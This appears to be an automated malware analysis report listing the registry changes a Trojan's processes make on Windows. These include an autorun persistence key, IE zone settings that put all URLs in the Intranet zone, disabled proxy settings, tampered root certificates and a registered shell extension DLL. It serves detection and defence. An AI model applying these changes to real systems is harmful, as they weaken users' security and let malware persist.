[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB C0 45 22 1E 9D 7B 43 9E B3 E3 26 49 49 C8 76"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
[HKCU\Software\VB and VBA Program Settings\wj\wj]
"On" = "0"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\Wuji\DEBUG]
"Trace Level" = ""
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\Wuji\DEBUG]
"Trace Level"
The process FhCalendar.exe:452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "73 49 09 89 D2 FF E1 F4 98 54 56 A4 80 9E BA 49"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\fhrl]
"update.exe" = "Update åºâ€Ã§â€Â¨Ã§Â¨â€¹Ã¥ÂºÂ"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process FhCalendar.exe:588 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "FhCalendar.exe"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1402636056"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2A 35 70 F7 CB 16 DA C6 8E 5B CD E0 CF CD 6F 2A"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process wujiime.exe:464 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\æ— æžÂ输入法]
"DisplayVersion" = "3.6"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\Interface\{7AB382B2-27F1-4590-8ED8-871321821585}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{FC094F33-9210-4A7D-AAE9-BB0310CB1D10}\VERSION]
"(Default)" = "1.0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\æ— æžÂ输入法]
"Publisher" = "Wuji"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\æ— æžÂ输入法]
"UninstallString" = "%Program Files%\Wuji\uninst.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\CLSID\{FC094F33-9210-4A7D-AAE9-BB0310CB1D10}]
"(Default)" = "pIContextMenu.ShellExt"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\VB and VBA Program Settings\wj\wj]
"ver" = "3.6"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCR\CLSID\{FC094F33-9210-4A7D-AAE9-BB0310CB1D10}\ProgID]
"(Default)" = "pIContextMenu.ShellExt"
[HKCR\TypeLib\{42E245AA-0C25-428F-98FA-55DC9CA83E6D}\1.0\HELPDIR]
"(Default)" = "%System%"
[HKCR\TypeLib\{42E245AA-0C25-428F-98FA-55DC9CA83E6D}\1.0\0\win32]
"(Default)" = "%System%\catsrvuz.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\æ— æžÂ输入法]
"URLInfoAbout" = "Wj"
[HKCR\Directory\Background\shellex\ContextMenuHandlers\with]
"(Default)" = "{FC094F33-9210-4A7D-AAE9-BB0310CB1D10}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCR\CLSID\{FC094F33-9210-4A7D-AAE9-BB0310CB1D10}\InprocServer32]
"(Default)" = "%System%\catsrvuz.dll"
[HKCR\TypeLib\{42E245AA-0C25-428F-98FA-55DC9CA83E6D}\1.0]
"(Default)" = "IContextMenu wj"
[HKCR\Interface\{7AB382B2-27F1-4590-8ED8-871321821585}\TypeLib]
"(Default)" = "{42E245AA-0C25-428F-98FA-55DC9CA83E6D}"
[HKCR\Interface\{7AB382B2-27F1-4590-8ED8-871321821585}]
"(Default)" = "_ShellExt"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCR\pIContextMenu.ShellExt\Clsid]
"(Default)" = "{FC094F33-9210-4A7D-AAE9-BB0310CB1D10}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKCR\CLSID\{FC094F33-9210-4A7D-AAE9-BB0310CB1D10}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A5 A2 42 55 B5 34 36 CF C2 A6 05 52 4A B4 70 68"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\æ— æžÂ输入法]
"DisplayName" = "æ— æžÂ输入法 3.6"
[HKCU\Software\VB and VBA Program Settings\jcity\tj]
"nt" = "55"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCR\Interface\{7AB382B2-27F1-4590-8ED8-871321821585}\TypeLib]
"Version" = "1.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCR\CLSID\{FC094F33-9210-4A7D-AAE9-BB0310CB1D10}\TypeLib]
"(Default)" = "{42E245AA-0C25-428F-98FA-55DC9CA83E6D}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"netsh.exe" = "Network Command Shell"
[HKCR\pIContextMenu.ShellExt]
"(Default)" = "pIContextMenu.ShellExt"
[HKCR\TypeLib\{42E245AA-0C25-428F-98FA-55DC9CA83E6D}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\Interface\{7AB382B2-27F1-4590-8ED8-871321821585}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The process MSIB.tmp:916 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F6 5B 7B 66 1D D9 48 61 68 AD 61 12 39 C3 6E 86"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\xxdd]
"SportLive.exe" = "ç›´æ’Âä¸Â心"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process xxdd_165.exe:452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "92 12 9D AB 46 B0 B5 90 35 C3 17 34 CC 48 AC 4B"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process updroots.exe:1016 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0E31CAD006F39C735CFF0FF9DDA41A52E9D0FD22]
"Blob" = "04 00 00 00 01 00 00 00 10 00 00 00 71 72 94 D7"
[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5]
"Blob" = "19 00 00 00 01 00 00 00 10 00 00 00 D8 B5 FB 36"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5]
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates]
"0E31CAD006F39C735CFF0FF9DDA41A52E9D0FD22"
[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5]
"File"
[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates]
"4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5"
The process 114gglm_016.exe:488 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9F 59 8D 28 D9 17 87 C6 FB 54 26 9D 38 F0 38 15"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\VB and VBA Program Settings\wj\wj]
"file" = "114gglm_016"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\VB and VBA Program Settings\wj\wj]
"ver" = "3.6"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"wjime" = "%Program Files%\Wuji\Wuji.exe auto"
The process Update.exe:444 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "24 55 5A 20 7D FB DF 55 8B 27 30 96 FA A1 F4 48"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process fhrl_6_12001.exe:320 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\thyz\FhCalendar.exe]
"(Default)" = "%Program Files%\fhrl\FhCalendar.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\፼ÃÂÈÕÀú]
"DisplayName" = "፼ÃÂÈÕÀú 1.00.001"
"DisplayVersion" = "1.00.001"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\፼ÃÂÈÕÀú]
"UninstallString" = "%Program Files%\fhrl\Fhuninstall.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\፼ÃÂÈÕÀú]
"URLInfoAbout" = "http://www.fhrlw.com"
"DisplayIcon" = "%Program Files%\fhrl\FhCalendar.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\፼ÃÂÈÕÀú]
"Publisher" = "ÌÆº²Ò×ÕßÃÂÅâ¼¼ÊõÓÃÂÃÂÞ¹«Ë¾"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8C 7F ED 19 00 E5 EE 7D 60 1D 7F 38 E2 5F C3 9F"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
The process fhsli_6_12001.exe:1852 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 04 CF D3 52 C8 23 F1 5E 97 A3 33 40 02 19 D1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
